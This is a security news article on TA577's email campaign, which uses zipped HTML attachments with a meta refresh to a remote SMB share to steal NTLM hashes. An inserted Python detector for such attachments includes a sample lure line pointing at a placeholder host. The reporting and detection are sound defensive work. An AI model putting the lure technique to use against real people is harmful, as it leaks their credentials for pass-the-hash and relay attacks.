lconstantin
CSO Senior Writer

Malicious email campaign steals NTLM hashes

News Analysis
04 Mar 2024 | 4 mins
Network Security, Phishing, Windows Security

An initial access broker grabs authentication information that can be used to access Windows networks when victims open the email attachments.


A threat group that acts as an initial access broker is targeting organizations with rogue email attachments that steal Microsoft Windows NT LAN Manager (NTLM) authentication information when opened. The group’s campaigns last week targeted hundreds of entities with thousands of email messages, researchers warn.

NTLM is the default authentication mechanism used on Windows networks when a computer tries to access network resources or services, for example file shares over the SMB protocol. NTLM credentials are not sent in the clear but as a cryptographic hash. However, depending on how complex the passwords are, there are ways to potentially recover them from such hashes, and the hashes can also be used directly in attacks.

“Proofpoint typically observes TA577 conducting attacks to deliver malware and has never observed this threat actor demonstrating the attack chain used to steal NTLM credentials first observed on 26 February,” researchers from security firm Proofpoint said in a report. “Recently, TA577 has been observed delivering Pikabot using a variety of attack chains.”

Thread hijacking leads to rogue HTML files

TA577, also tracked in the security industry as Hive0118, is a financially motivated access broker with a long history of distributing trojan programs. The group used to be one of the main affiliates for the Qbot botnet before it was disrupted, but has also been observed distributing malware programs such as IcedID, SystemBC, SmokeLoader, Ursnif, Cobalt Strike, and more recently Pikabot.

Since the group sells access to computers to other cybercriminal gangs, the systems compromised by TA577 have had follow-on ransomware infections, most notably with Black Basta. TA577 also specializes in a technique known as thread hijacking where their rogue email messages are crafted to appear as replies to previously sent legitimate emails. The latest campaigns seen by Proofpoint used messages in which recipients were asked if they had time to look at a document sent previously.

The emails contained a .zip archive together with the password needed to unpack it. The archive in turn contained an innocuous-looking HTML document that was customized for each victim. When opened, the HTML automatically triggers a connection attempt to a remote SMB server controlled by the attackers via a meta refresh in the file that points to a file scheme URI ending in .txt.
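As an added illustration for defenders (not code from the Proofpoint report or this article), the following Python checks an HTML attachment for a meta refresh that points at a remote file-scheme URI or UNC path, the trigger described above; the sample HTML and the host 203.0.113.10 are constructed placeholders, not indicators from the campaign.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class MetaRefreshFinder(HTMLParser):
    """Collect the URL targets of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "meta":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() != "refresh":
            return
        # content looks like "0; url=file://host/share/x.txt"; case, quoting and spacing vary
        m = re.search(r"url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.I)
        if m:
            self.targets.append(m.group(1).strip())


def remote_file_targets(html_text):
    """Return meta-refresh targets that would make Windows open a remote UNC path
    (file:// with a non-local host, or a bare \\\\host\\share path). Such an
    attachment should be quarantined for review rather than opened."""
    parser = MetaRefreshFinder()
    parser.feed(html_text)
    hits = []
    for target in parser.targets:
        if target.lower().startswith("file:"):
            host = urlparse(target).netloc
            if host and host.lower() not in ("localhost", "127.0.0.1"):
                hits.append(target)
        elif target.startswith("\\\\"):  # bare UNC path \\host\share\file
            hits.append(target)
    return hits


# Constructed samples: a lure-style document and a benign redirect page.
SAMPLE_LURE = """<html><head>
<meta http-equiv="refresh" content="0; url=file://203.0.113.10/docs/invoice.txt">
</head><body>Loading document...</body></html>"""
SAMPLE_BENIGN = """<html><head>
<meta http-equiv="refresh" content="5; url=https://example.com/doc">
</head></html>"""

if __name__ == "__main__":
    print(remote_file_targets(SAMPLE_LURE))    # ['file://203.0.113.10/docs/invoice.txt']
    print(remote_file_targets(SAMPLE_BENIGN))  # []
```

A mail gateway can run this over HTML files extracted from password-protected archives, since the password is supplied in the same message.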

“Proofpoint has not observed malware delivery from these URLs,” the Proofpoint researchers said. “Instead, researchers assess with high confidence TA577’s objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used.”

The researchers saw signs that the SMB server was running Impacket, an open-source toolkit for working with network protocols and capturing packets. NTLM hashes could be used in pass-the-hash or NTLM relay attacks where attackers use the hashes to move laterally through a network and access additional machines and resources that accept the authentication tokens.

NTLM leaks to remote SMB servers are not new and should be treated as a serious risk. Last year, Microsoft patched a vulnerability in Outlook that allowed attackers to leak NTLM hashes to remote servers by simply sending an email to victims. The flaw was rated with critical severity.

In addition to the NTLM hashes, a connection to a remote SMB server could leak information about the victim’s computer, such as the computer name, the domain name it’s associated with and the victim’s username.

“It is notable that TA577 delivered the malicious HTML in a zip archive to generate a local file on the host,” the Proofpoint researchers said. “If the file scheme URI was sent directly in the email body, the attack would not work on Outlook mail clients patched since July 2023. Disabling guest access to SMB does not mitigate the attack, since the file must attempt to authenticate to the external SMB server to determine if it should use guest access.”

Organizations are encouraged to block outbound SMB and WebDAV connections at their network perimeters to prevent such leaks as more attackers have been adopting this technique.